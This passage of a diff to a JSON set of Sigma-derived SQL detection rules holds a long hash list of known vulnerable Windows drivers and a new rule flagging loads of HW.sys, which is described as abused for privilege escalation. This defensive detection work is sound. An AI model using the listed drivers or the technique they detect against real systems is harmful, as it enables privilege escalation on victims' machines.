'b48a309ee0960da3caaaaf1e794e8c409993aeb3a2b64809f36b97aac8a1e62a', '84bf1d0bcdf175cfe8aea2973e0373015793d43907410ae97e2071b2c4b8e2d4', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c9b49b52b493b53cd49c12c3fa9553e57c5394555b64e32d1208f5b96a5b8c6e', '79e2d37632c417138970b4feba91b7e10c2ea251c5efe3d1fc6fa0190f176b57', '3390919bb28d5c36cc348f9ef23be5fa49bfd81263eb7740826e4437cbe904cd', '58c071cfe72e9ee867bba85cbd0abe72eb223d27978d6f0650d0103553839b59', '607dc4c75ac7aef82ae0616a453866b3b358c6cf5c8f9d29e4d37f844306b97c', '358ac54be252673841a1d65bfc2fb6d549c1a4c877fa7f5e1bfa188f30375d69', 'd0bd1ae72aeb5f3eabf1531a635f990e5eaae7fdd560342f915f723766c80889', 'f85cca4badff17d1aa90752153ccec77a68ad282b69e3985fdc4743eaea85004', '6908ebf52eb19c6719a0b508d1e2128f198d10441551cbfb9f4031d382f5229f', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', 'de6bf572d39e2611773e7a01f0388f84fb25da6cba2f1f8b9b36ffba467de6fa', '950a4c0c772021cee26011a92194f0e58d61588f77f2873aa0599dff52a160c9', '36505921af5a09175395ebaea29c72b2a69a3a9204384a767a5be8a721f31b10', '6de84caa2ca18673e01b91af58220c60aecd5cccf269725ec3c7f226b2167492', 'ef86c4e5ee1dbc4f81cd864e8cd2f4a2a85ee4475b9a9ab698a4ae1cc71fbeb0', 
'478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '7cfa5e10dff8a99a5d544b011f676bc383991274c693e21e3af40cf6982adb8c', 'f596e64f4c5d7c37a00493728d8756b243cfdc11e3372d6d6dfeffc13c9ab960', '0aafa9f47acf69d46c9542985994ff5321f00842a28df2396d4a3076776a83cb', '131d5490ceb9a5b2324d8e927fea5becfc633015661de2f4c2f2375a3a3b64c6', '3124b0411b8077605db2a9b7909d8240e0d554496600e2706e531c93c931e1b5', '1b7fb154a7b7903a3c81f12f4b094f24a3c60a6a8cffca894c67c264ab7545fa', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497', '9c2f3e9811f7d0c7463eaa1ee6f39c23f902f3797b80891590b43bbe0fdf0e51', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c60fcff9c8e5243bbb22ec94618b9dcb02c59bb49b90c04d7d6ab3ebbd58dc3a', '4045ae77859b1dbf13972451972eaaf6f3c97bea423e9e78f1c2f14330cd47ca', 'a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '3f2fda9a7a9c57b7138687bbce49a2e156d6095dddabb3454ea09737e02c3fa5', 'f8965fdce668692c3785afa3559159f9a18287bc0d53abb21902895a8ecf221b', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', '5bc3994612624da168750455b363f2964e1861dba4f1c305df01b970ac02a7ae', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '0fd2df82341bf5ebb8a53682e60d08978100c01acb0bed7b6ce2876ada80f670', '8111085022bda87e5f6aa4c195e743cc6dd6a3a6d41add475d267dc6b105a69f', 'be03e9541f56ac6ed1e81407dcd7cc85c0ffc538c3c2c2c8a9c747edbcf13100', '47f08f7d30d824a8f4bb8a98916401a37c0fd8502db308aba91fe3112b892dcc', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '7f375639a0df7fe51e5518cf87c3f513c55bc117db47d28da8c615642eb18bfa', 'a56c2a2425eb3a4260cc7fc5c8d7bed7a3b4cd2af256185f24471c668853aee8', 
'a3e507e713f11901017fc328186ae98e23de7cea5594687480229f77d45848d8', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '9529efb1837b1005e5e8f477773752078e0a46500c748bc30c9b5084d04082e6', '2bbe65cbec3bb069e92233924f7ee1f95ffa16173fceb932c34f68d862781250', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '39cfde7d401efce4f550e0a9461f5fc4d71fa07235e1336e4f0b4882bd76550e', '984a77e5424c6d099051441005f2938ae92b31b5ad8f6521c6b001932862add7', 'db2a9247177e8cdd50fe9433d066b86ffd2a84301aa6b2eb60f361cfff077004', '30706f110725199e338e9cc1c940d9a644d19a14f0eb8847712cba4cacda67ab', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', '9f4ce6ab5e8d44f355426d9a6ab79833709f39b300733b5b251a0766e895e0e5', 'd92eab70bcece4432258c9c9a914483a2267f6ab5ce2630048d3a99e8cb1b482', 'e4a7da2cf59a4a21fc42b611df1d59cae75051925a7ddf42bf216cc1a026eadb', '525d9b51a80ca0cd4c5889a96f857e73f3a80da1ffbae59851e0f51bdfb0b6cd', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '4cff6e53430b81ecc4fae453e59a0353bcfe73dd5780abfc35f299c16a97998e', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', 'f8236fc01d4efaa48f032e301be2ebba4036b2cd945982a29046eca03944d2ae', '575e58b62afab094c20c296604dc3b7dd2e1a50f5978d8ee24b7dca028e97316', '3d9e83b189fcf5c3541c62d1f54a0da0a4e5b62c3243d2989afc46644056c8e3', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', 'c0d88db11d0f529754d290ed5f4c34b4dba8c4f2e5c4148866daabeab0d25f9c', '7e0124fcc7c95fdc34408cf154cb41e654dade8b898c71ad587b2090b1da30d7', '61a1bdddd3c512e681818debb5bee94db701768fc25e674fcad46592a3259bd0', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '45abdbcd4c0916b7d9faaf1cd08543a3a5178871074628e0126a6eda890d26e0', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', 
'1e8b0c1966e566a523d652e00f7727d8b0663f1dfdce3b9a09b9adfaef48d8ee', 'e7af7bcb86bd6bab1835f610671c3921441965a839673ac34444cf0ce7b2164e', '93d873cdf23d5edc622b74f9544cac7fe247d7a68e1e2a7bf2879fad97a3ae63', 'a9706e320179993dade519a83061477ace195daa1b788662825484813001f526', '61d6e40601fa368800980801a662a5b3b36e3c23296e8ae1c85726a56ef18cc8', '47eaebc920ccf99e09fc9924feb6b19b8a28589f52783327067c9b09754b5e84', 'fd8669794c67b396c12fc5f08e9c004fdf851a82faf302846878173e4fbecb03', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', '07b6d69bafcfd767f1b63a490a8843c3bb1f8e1bbea56176109b5743c8f7d357', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', '99f4994a0e5bd1bf6e3f637d3225c69ff4cd620557e23637533e7f18d7d6cba1', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', 'ece0a900ea089e730741499614c0917432246ceb5e11599ee3a1bb679e24fd2c', '8ef0ad86500094e8fa3d9e7d53163aa6feef67c09575c169873c494ed66f057f', '36b9e31240ab0341873c7092b63e2e0f2cab2962ebf9b25271c3a1216b7669eb', '6b830ea0db6546a044c9900d3f335e7820c2a80e147b0751641899d1a5aa8f74', '9c10e2ec4f9ef591415f9a784b93dc9c9cdafa7c69602c0dc860c5b62222e449', '5b9623da9ba8e5c80c49473f40ffe7ad315dcadffc3230afdc9d9226d60a715a', 'fafa1bb36f0ac34b762a10e9f327dcab2152a6d0b16a19697362d49a31e7f566', 'e61a54f6d3869b43c4eceac3016df73df67cce03878c5a6167166601c5d3f028', 'f88ebb633406a086d9cca6bc8b66a4ea940c5476529f9033a9e0463512a23a57', '2aa1b08f47fbb1e2bd2e4a492f5d616968e703e1359a921f62b38b8e4662f0c4', '06508aacb4ed0a1398a2b0da5fa2dbf7da435b56da76fd83c759a50a51c75caf', 'cc383ad11e9d06047a1558ed343f389492da3ac2b84b71462aee502a2fa616c8', '845f1e228de249fc1ddf8dc28c39d03e8ad328a6277b6502d3932e83b879a65a', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', '64f9e664bc6d4b8f5f68616dd50ae819c3e60452efd5e589d6604b9356841b57', '2a652de6b680d5ad92376ad323021850dab2c653abf06edf26120f7714b8e08a', 
'85866e8c25d82c1ec91d7a8076c7d073cccf421cf57d9c83d80d63943a4edd94', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', 'bb50818a07b0eb1bd317467139b7eb4bad6cd89053fecdabfeae111689825955', '9bb09752cf3a464455422909edef518ac18fe63cf5e1e8d9d6c2e68db62e0c87', 'b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '1c8dfa14888bb58848b4792fb1d8a921976a9463be8334cff45cc96f1276049a', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', '5c1585b1a1c956c7755429544f3596515dfdf928373620c51b0606a520c6245a', 'f40435488389b4fb3b945ca21a8325a51e1b5f80f045ab019748d0ec66056a8b', '405472a8f9400a54bb29d03b436ccd58cfd6442fe686f6d2ed4f63f002854659', '3a95cc82173032b82a0ffc7d2e438df64c13bc16b4574214c9fe3be37250925e', '42579a759f3f95f20a2c51d5ac2047a2662a2675b3fb9f46c1ed7f23393a0f00', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '159e7c5a12157af92e0d14a0d3ea116f91c09e21a9831486e6dc592c93c10980', '5c04c274a708c9a7d993e33be3ea9e6119dc29527a767410dbaf93996f87369a', 'fcdfe570e6dc6e768ef75138033d9961f78045adca53beb6fdb520f6417e0df1', 'cb57f3a7fe9e1f8e63332c563b0a319b26c944be839eabc03e9a3277756ba612', '4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6', '80cbba9f404df3e642f22c476664d63d7c229d45d34f5cd0e19c65eb41becec3', '29e0062a017a93b2f2f5207a608a96df4d554c5de976bd0276c2590a03bd3e94', 'db90e554ad249c2bd888282ecf7d8da4d1538dd364129a3327b54f8242dd5653', '8dafe5f3d0527b66f6857559e3c81872699003e0f2ffda9202a1b5e29db2002e', '101402d4f5d1ae413ded499c78a5fcbbc7e3bae9b000d64c1dd64e3c48c37558', '6ed35f310c96920a271c59a097b382da07856e40179c2a4239f8daa04eef38e7', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', 
'37dde6bd8a7a36111c3ac57e0ac20bbb93ce3374d0852bcacc9a2c8c8c30079e', '5d530e111400785d183057113d70623e17af32931668ab7c7fc826f0fd4f91a3', 'd7bc7306cb489fe4c285bbeddc6d1a09e814ef55cf30bd5b8daf87a52396f102', '7049f3c939efe76a5556c2a2c04386db51daf61d56b679f4868bb0983c996ebb', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '3243aab18e273a9b9c4280a57aecef278e10bfff19abb260d7a7820e41739099', '0040153302b88bee27eb4f1eca6855039e1a057370f5e8c615724fa5215bada3', 'f0605dda1def240dc7e14efa73927d6c6d89988c01ea8647b671667b2b167008', 'b1334a71cc73b3d0c54f62d8011bec330dfc355a239bf94a121f6e4c86a30a2e', '74a846c61adc53692d3040aff4c1916f32987ad72b07fe226e9e7dbeff1036c4', '7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6', 'c1c4310e5d467d24e864177bdbfc57cb5d29aac697481bfa9c11ddbeebfd4cc8', '22418016e980e0a4a2d01ca210a17059916a4208352c1018b0079ccb19aaf86a', '76b86543ce05540048f954fed37bdda66360c4a3ddb8328213d5aef7a960c184', 'dd4a1253d47de14ef83f1bc8b40816a86ccf90d1e624c5adf9203ae9d51d4097', '025e7be9fcefd6a83f4471bba0c11f1c11bd5047047d26626da24ee9a419cdc4', '50d5eaa168c077ce5b7f15b3f2c43bd2b86b07b1e926c1b332f8cb13bd2e0793', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '749b0e8c8c8b7dda8c2063c708047cfe95afa0a4d86886b31a12f3018396e67c', 'd8459f7d707c635e2c04d6d6d47b63f73ba3f6629702c7a6e0df0462f6478ae2', '49f75746eebe14e5db11706b3e58accc62d4034d2f1c05c681ecef5d1ad933ba', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', 'ae79e760c739d6214c1e314728a78a6cb6060cce206fde2440a69735d639a0a2', '4422851a0a102f654e95d3b79c357ae3af1b096d7d1576663c027cfbc04abaf9', '84df20b1d9d87e305c92e5ffae21b10b325609d59d835a954dbd8750ef5dabf4', '7a7e8df7173387aec593e4fe2b45520ea3156c5f810d2bb1b2784efd1c922376', 'cd4a249c3ef65af285d0f8f30a8a96e83688486aab515836318a2559757a89bb', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '47f0cdaa2359a63ad1389ef4a635f1f6eee1f63bdf6ef177f114bdcdadc2e005', 
'18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1', '8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce', '36875562e747136313ec5db58174e5fab870997a054ca8d3987d181599c7db6a', '7877c1b0e7429453b750218ca491c2825dae684ad9616642eff7b41715c70aca', '591bd5e92dfa0117b3daa29750e73e2db25baa717c31217539d30ffb1f7f3a52', '04a85e359525d662338cae86c1e59b1d7aa9bd12b920e8067503723dc1e03162', '4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', 'e81230217988f3e7ec6f89a06d231ec66039bdba340fd8ebb2bbb586506e3293', '49c827cf48efb122a9d6fd87b426482b7496ccd4a2dbca31ebbf6b2b80c98530', 'd8b58f6a89a7618558e37afc360cd772b6731e3ba367f8d58734ecee2244a530', '7ec93f34eb323823eb199fbf8d06219086d517d0e8f4b9e348d7afd41ec9fd5d', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '89b0017bc30cc026e32b758c66a1af88bd54c6a78e11ec2908ff854e00ac46be', 'e005e8d183e853a27ad3bb56f25489f369c11b0d47e3d4095aad9291b3343bf1', '5f5e5f1c93d961985624768b7c676d488c7c7c1d4c043f6fc1ea1904fefb75be', 'cdd2a4575a46bada4837a6153a79c14d60ee3129830717ef09e0e3efd9d00812', 'ac3f613d457fc4d44fa27b2e0b1baa62c09415705efb5a40a4756da39b3ac165', '475e5016c9c0f5a127896f9179a1b1577a67b357f399ab5a1e68aab07134729a', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '0de4247e72d378713bcf22d5c5d3874d079203bb4364e25f67a90d5570bdcce8', '72b99147839bcfb062d29014ec09fe20a8f261748b5925b00171ef3cb849a4c1', 'cc586254e9e89e88334adee44e332166119307e79c2f18f6c2ab90ce8ba7fc9b', 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe', 
'5ee292b605cd3751a24e5949aae615d472a3c72688632c3040dc311055b75a92', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', 'f8886a9c759e0426e08d55e410b02c5b05af3c287b15970175e4874316ffaf13', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', '2da330a2088409efc351118445a824f11edbe51cf3d653b298053785097fe40e', '54841d9f89e195196e65aa881834804fe3678f1cf6b328cab8703edd15e3ec57', 'e6a7b0bc01a627a7d0ffb07faddb3a4dd96b6f5208ac26107bdaeb3ab1ec8217', 'cf4b5fa853ce809f1924df3a3ae3c4e191878c4ea5248d8785dc7e51807a512b', '6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1', '708016fbe22c813a251098f8f992b177b476bd1bbc48c2ed4a122ff74910a965', '362c4f3dadc9c393682664a139d65d80e32caa2a97b6e0361dfd713a73267ecc', '08eb2d2aa25c5f0af4e72a7e0126735536f6c2c05e9c7437282171afe5e322c6', '2d83ccb1ad9839c9f5b3f10b1f856177df1594c66cbbc7661677d4b462ebf44d', 'c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c', '4941c4298f4560fc1e59d0f16f84bab5c060793700b82be2fd7c63735f1657a8', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', '76fb4deaee57ef30e56c382c92abffe2cf616d08dbecb3368c8ee6b02e59f303', '3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25', '7196187fb1ef8d108b380d37b2af8efdeb3ca1f6eefd37b5dc114c609147216d', 'f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', 'b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3', 'fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8', 'd5586dc1e61796a9ae5e5d1ced397874753056c3df2eb963a8916287e1929a71', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', '6cb51ae871fbd5d07c5aad6ff8eea43d34063089528603ca9ceb8b4f52f68ddc', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2', 
'dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc', '6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421', 'e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa', '0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff', '3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c', '7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f', '9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395', 'aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79', '146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88', '9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b', 'cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', '436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7', 'b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf', 'b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469', '4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7', 'af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685', 'b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d', 'ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41', '06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4', '4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80', 
'314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', '4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe', '38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a', '56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7', '455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b', 'e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', 'b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414', 'dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22', '221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', '78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f', '7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457', 'd5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3', 'fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533', 'f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', 'dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8', '21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21', '91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c', '98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8', 'd25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26', '6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4', '3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5', '8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f', '3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8', 
'71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', 'b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a', '3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499', '509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', '09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1', '1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b')))" ], - "filename": "win_system_vul_cve_2020_1472.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", - "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "status": "experimental", + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - 
"attack.defense_evasion", - "attack.t1574.002" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" ], - "filename": "win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_vuln_hw_driver.yml" }, { - "title": "Windows Pcap Drivers", - "id": "7b687634-ab20-11ea-bb37-0242ac130002", + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "status": "test", - "description": "Detects Windows 
